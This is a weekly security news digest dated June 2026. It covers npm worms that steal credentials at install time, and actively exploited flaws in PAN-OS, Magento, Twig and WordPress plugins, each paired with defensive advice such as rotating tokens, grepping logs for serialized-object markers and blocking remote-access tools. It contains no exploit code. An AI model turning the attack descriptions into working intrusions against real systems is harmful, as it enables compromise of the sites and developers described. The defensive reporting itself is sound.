Skip to dossier
fruition.net
just verified
The Perimeter · Issue 06-12-2026

npm worms keep coming, PAN-OS exploited, WordPress plugins under active attack

The npm ecosystem absorbed another wave of self-propagating malware this week. The Shai-Hulud miasma variant expanded to 304+ packages, a new node-gyp-abusing worm hides in binding.gyp, and the @redhat-cloud-services namespace was hijacked. If your CI builds touch npm, treat install-time as hostile execution. On the perimeter, CISA added PAN-OS CVE-2026-0257 (authentication bypass, actively exploited) and a Mirasvit Magento PHP-deserialization RCE to KEV. WordPress operators get a triple: Everest Forms Pro, Burst Statistics, and Kirki are all under active exploitation, with Kirki affecting ~150k sites via unauthenticated account takeover. Recalculate: assume any developer workstation that ran `npm install` in the past two weeks is potentially compromised, and audit your WordPress plugin inventory against this week's actively-exploited list before Friday.
Published
Friday, June 12, 2026
Entries
12
Cadence
Weekly · Fridays
Curator
Brad Anderson
Wire
cisa.gov New addition to the Known Exploited Vulnerabilities catalog ·
github.com GHSA: critical npm package compromise affecting CI pipelines ·
wordfence.com WordPress plugin vulnerability with active exploitation ·
drupal.org Highly critical core security advisory published ·
aws.amazon.com AWS security bulletin: IAM policy evaluation update ·
unit42.paloaltonetworks.com Threat actor expands toolkit targeting public-facing PHP apps ·
krebsonsecurity.com Breach disclosure with named victim and confirmed initial vector ·
snyk.io Composer dependency advisory affecting production framework versions ·
cisa.gov New addition to the Known Exploited Vulnerabilities catalog ·
github.com GHSA: critical npm package compromise affecting CI pipelines ·
wordfence.com WordPress plugin vulnerability with active exploitation ·
drupal.org Highly critical core security advisory published ·
aws.amazon.com AWS security bulletin: IAM policy evaluation update ·
unit42.paloaltonetworks.com Threat actor expands toolkit targeting public-facing PHP apps ·
krebsonsecurity.com Breach disclosure with named victim and confirmed initial vector ·
snyk.io Composer dependency advisory affecting production framework versions ·
01

Web Application

frameworks · browsers · authentication flows

no entries this week

02

Supply Chain

packages · build systems · dependency attacks

sonatype.com 2d
▲ headline

Shai-Hulud miasma wave expands to 304 npm packages

Sonatype is tracking a new wave of the self-propagating Shai-Hulud worm, now confirmed in 304 npm components as of June 5. The malware steals developer credentials at install time and uses them to republish further infected packages, including via the @redhat-cloud-services namespace hijack reported June 1. Unit 42 separately documents CI/CD persistence and multi-stage payloads in the post-Shai-Hulud landscape.

npm @redhat-cloud-services GitHub Actions
Fruition take

Treat any workstation or CI runner that executed `npm install` since late May as suspect. Rotate npm tokens, GitHub PATs, and any cloud credentials reachable from build environments; pin and review @redhat-cloud-services and other namespace dependencies in lockfiles.

snyk.io 3d

Node-gyp worm hides in binding.gyp to bypass lifecycle-script defenses

Snyk documents an npm worm that abuses binding.gyp to trigger node-gyp during install, executing attacker code without using the lifecycle scripts (preinstall/postinstall) that most defenders monitor or disable. The payload steals credentials, persists via GitHub, and republishes from compromised maintainer accounts.

npm node-gyp
Fruition take

Disabling npm lifecycle scripts (`--ignore-scripts`) is no longer sufficient. Audit installed packages with native components for unexpected binding.gyp behavior and constrain CI builds to ephemeral runners with no long-lived credentials in env.

03

Infrastructure

kubernetes · cloud · network · ingress

kubernetes.io 1w

Kubernetes SRC corrects records for four unfixed CVEs, will surface in scanners June 1

The Kubernetes Security Response Committee is correcting CVE records for CVE-2020-8554, CVE-2020-8561, CVE-2020-8562, and CVE-2021-25740 to remove inaccurate fixed-version metadata. Scanners may begin flagging these in clusters that previously appeared clean. The underlying issues (external IP services, kube-apiserver SSRF, control-plane localhost timing, cross-namespace ownership) remain unfixed by design and require operator-side mitigations.

CVE-2020-8554 CVE-2020-8561 CVE-2020-8562 +1 more Kubernetes
Fruition take

Expect cluster scanners to light up after June 1. Pre-empt the noise: document RBAC restrictions on Service.spec.externalIPs and Endpoints across your fleet, and confirm admission policies block cross-namespace ownerReferences.

cloud.google.com 1w

KnowledgeDeliver ViewState deserialization zero-day (CVE-2026-5426) exploited in the wild

Mandiant disclosed CVE-2026-5426, an unauthenticated RCE in KnowledgeDeliver LMS caused by identical pre-shared ASP.NET machine keys across customer deployments, allowing ViewState deserialization attacks. It was exploited as a zero-day to compromise an LMS host and inject malicious code served to visitors.

CVE-2026-5426 KnowledgeDeliver ASP.NET
Fruition take

Any ASP.NET application that ships with a vendor-default machineKey is one disclosure away from this same outcome. Audit web.config files in IIS deployments for non-unique machineKey values and rotate.

04

PHP & CMS

wordpress · drupal · plugins · php frameworks

github.com 1d CVSS 8.8

Twig sandbox bypass via source policy enables arbitrary PHP callables

CVE-2026-24425 (CVSS 8.8): when Twig's sandbox is enabled via a SourcePolicyInterface rather than globally, the runtime check that rejects non-Closure callbacks on sort/filter/map/reduce fails to consult the current template Source. Sandboxed templates can pass arbitrary PHP callables, breaking the sandbox boundary. Additional toString and XSS issues (CVE-2026-47732, CVE-2026-47730) were patched concurrently.

CVE-2026-24425 CVE-2026-47732 CVE-2026-47730 Twig Symfony Drupal
Fruition take

Drupal and Symfony stacks that allow user-authored Twig templates (multi-tenant CMS, email templating) should patch this week. If you rely on the sandbox via a source policy specifically, treat any prior tenant-supplied template as potentially malicious until reviewed.

wordfence.com 3d

Everest Forms Pro RCE under active exploitation

Wordfence confirms in-the-wild exploitation of a critical unauthenticated remote code execution vulnerability disclosed March 30 in Everest Forms Pro (~4,000 active installs). Sites that have not updated since disclosure should be considered potentially compromised.

Everest Forms Pro
Fruition take

If you run Everest Forms Pro on any client site, patch immediately and review for new admin users, modified theme files, and unexpected wp-content/uploads PHP files written since April.

nvd.nist.gov this week KEV

CISA adds Mirasvit Magento PHP-deserialization RCE to KEV

CVE-2026-45247 in Mirasvit's Full Page Cache Warmer for Magento allows unauthenticated remote code execution via a crafted serialized PHP object delivered in the CacheWarmer cookie. CISA added it to KEV on June 3 based on confirmed exploitation.

CVE-2026-45247 Mirasvit Full Page Cache Warmer Magento
Fruition take

If any Magento storefront in scope uses Mirasvit Full Page Cache Warmer, patch or remove this week and grep access logs for CacheWarmer cookie values containing serialized object markers (`O:`, `a:`).

wordfence.com this week

Burst Statistics authentication bypass exploited on 200k WordPress sites

Wordfence reports active exploitation of a critical authentication bypass in Burst Statistics (200,000 installs). Unauthenticated attackers with knowledge of an admin username can impersonate that account and achieve full site takeover. Patched May 13; exploitation began shortly after disclosure.

Burst Statistics
Fruition take

Update Burst Statistics now and audit user list for unexpected admin role changes or sessions from new IPs in the past three weeks.

wordfence.com this week

Unauthenticated privilege escalation in Kirki affects ~150k WordPress sites

Wordfence disclosed an unauthenticated privilege escalation in the Kirki WordPress plugin, introduced in the 6.0 release. Attackers can abuse the password reset flow to take over arbitrary accounts including administrators. Of the 500k+ installs, ~150k are running affected 6.x versions.

Kirki WordPress plugin
Fruition take

Inventory WordPress sites for Kirki >= 6.0, update immediately, and force a password reset on admin accounts. Customizer-heavy themes frequently bundle Kirki — check theme-vendored copies too.

05

Identity & Auth

oauth · saml · iam · session attacks

no entries this week

06

Threat Intel

active exploitation · breaches · ransomware

unit42.paloaltonetworks.com 1d KEV
▲ headline

PAN-OS CVE-2026-0257 authentication bypass under active exploitation, added to KEV

Unit 42 confirms active exploitation of CVE-2026-0257, an authentication bypass in PAN-OS that lets attackers establish unauthorized VPN connections without credentials. CISA added it to the KEV catalog on May 29. Indicators and mitigation guidance are published; Palo Alto has fixes available.

CVE-2026-0257 Palo Alto Networks PAN-OS GlobalProtect
Fruition take

If you run PAN-OS as a perimeter or remote-access gateway for any client environment, patch this week and pull GlobalProtect logs for unexpected portal logins since mid-May.

cloud.google.com 1d

Mandiant: UNC3753 (Luna Moth) vishing campaign hitting US law and finance firms

Mandiant attributes a January–May 2026 extortion campaign against dozens of US professional services, legal, and financial organizations to UNC3753 (Luna Moth / Silent Ransom Group). Initial access is voice-phishing of staff into installing legitimate RMM tools under a fake IT-support or invoice pretext, then exfiltration and extortion without ransomware deployment.

Fruition take

If you operate client portals for legal or financial firms, ensure RMM tools (AnyDesk, Atera, ScreenConnect, Zoho Assist) are explicitly allowlisted at the endpoint and blocked by default. Brief support staff that screen-share-during-a-cold-call is the current attack pattern.

darkreading.com 1d

Internet-exposed fuel tank gauges attacked at US gas stations

Dark Reading reports active attacks against internet-exposed Automatic Tank Gauges at US gas stations, with threat actors using the access for operational disruption. The exposure pattern (Modbus/TCP and Veeder-Root protocol on public IPs) has been documented for years but is now being exploited at scale.

Automatic Tank Gauges Veeder-Root